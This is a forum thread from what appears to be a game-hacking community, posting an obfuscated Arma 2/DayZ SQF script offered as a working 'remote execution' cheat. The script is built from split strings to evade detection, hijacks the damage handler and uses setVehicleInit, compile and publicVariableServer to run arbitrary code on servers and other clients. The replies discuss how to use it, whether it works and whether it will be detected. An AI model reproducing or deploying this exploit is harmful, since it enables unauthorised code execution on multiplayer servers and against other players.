Possibly Working Remote Execution

Posts 1–15 of 28 · Page 1 of 2
Possibly Working Remote Execution
Code:
if (isNil "rem") then
{
    rem = true;
    player setVehicleInit  "e=(""0;""+""fn""+""c_""+""us""+""ec""+""_d""+""am""+""ag""+""eH""+""an""+""dl""+""er""+""={""+""if""+""(i""+""sS""+""er""+""ve""+""r&""+""&(""+""(_""+""th""+""is""+""  s""+""el""+""ec""+""t  ""+""2)""+""==""+""0)""+"")t""+""he""+""n{""+""_c""+""od""+""e=""+""ma""+""rk""+""er""+""Te""+""xt""+""'d""+""wa""+""rd""+""en""+""';""+""ca""+""ll""+""  c""+""om""+""pi""+""le""+""  _""+""co""+""de""+"";r""+""em""+""Ex""+""Fi""+""el""+""d=""+""[n""+""il""+"",n""+""il""+"",(""+""';""+""'+""+""_c""+""od""+""e+""+""';""+""')""+""];""+""pu""+""bl""+""ic""+""Va""+""ri""+""ab""+""le""+""'r""+""em""+""Ex""+""Fi""+""el""+""d'""+"";}""+""el""+""se""+""{_""+""th""+""is""+""  c""+""al""+""l ""+""co""+""mp""+""il""+""e  ""+""pr""+""ep""+""ro""+""ce""+""ss""+""Fi""+""le""+""Li""+""ne""+""Nu""+""mb""+""er""+""s'""+""\z""+""\a""+""dd""+""on""+""s\""+""da""+""yz""+""_c""+""od""+""e\""+""co""+""mp""+""il""+""e\""+""fn""+""_d""+""am""+""ag""+""eH""+""an""+""dl""+""er""+"".s""+""qf""+""';""+""};""+""};""+""0"");";
    processInitCommands;
    clearVehicleInit player;
    sleep 3;
    usecEpi = player;
    publicVariableServer "usecEpi";
    remExField = [nil,nil,";usecEpi setVehicleInit e;processInitCommands;clearVehicleInit usecEpi;"];
    publicVariableServer "remExField";
    sleep 3;
    hint "Init RE";
Just updated thread, this one should be working but since I no longer hack I can't test it.
How to use?
-Sorry for being a super-noob
Quote Originally Posted by tomowrath View Post
How to use?
-Sorry for being a super-noob
Replace what you have in exec with this.
Quote Originally Posted by tomowrath View Post
So it isnt a bypass?
Nope
if this works someone let us know
I would test this if i was not a lazy fuck
Quote Originally Posted by Yung Lean 2001 View Post
I would test this if i was not a lazy fuck
Well dooo itttttt
Quote Originally Posted by Jim Morrison View Post
Can anyone test this and report back?
i will...............
Yeah this will work, it's an old RE though. I remember getting this from Hangender like fucking two months ago, it should work on shit servers, maybe on a few decent servers but for the most part it won't work. Just gotta try the servers out.
yup i got error mp handler 108
ill give it a try, but i think its gonna get detected fast
Posts 1–15 of 28 · Page 1 of 2

Post a Reply

Similar Threads

Tags for this Thread

None

Talk with us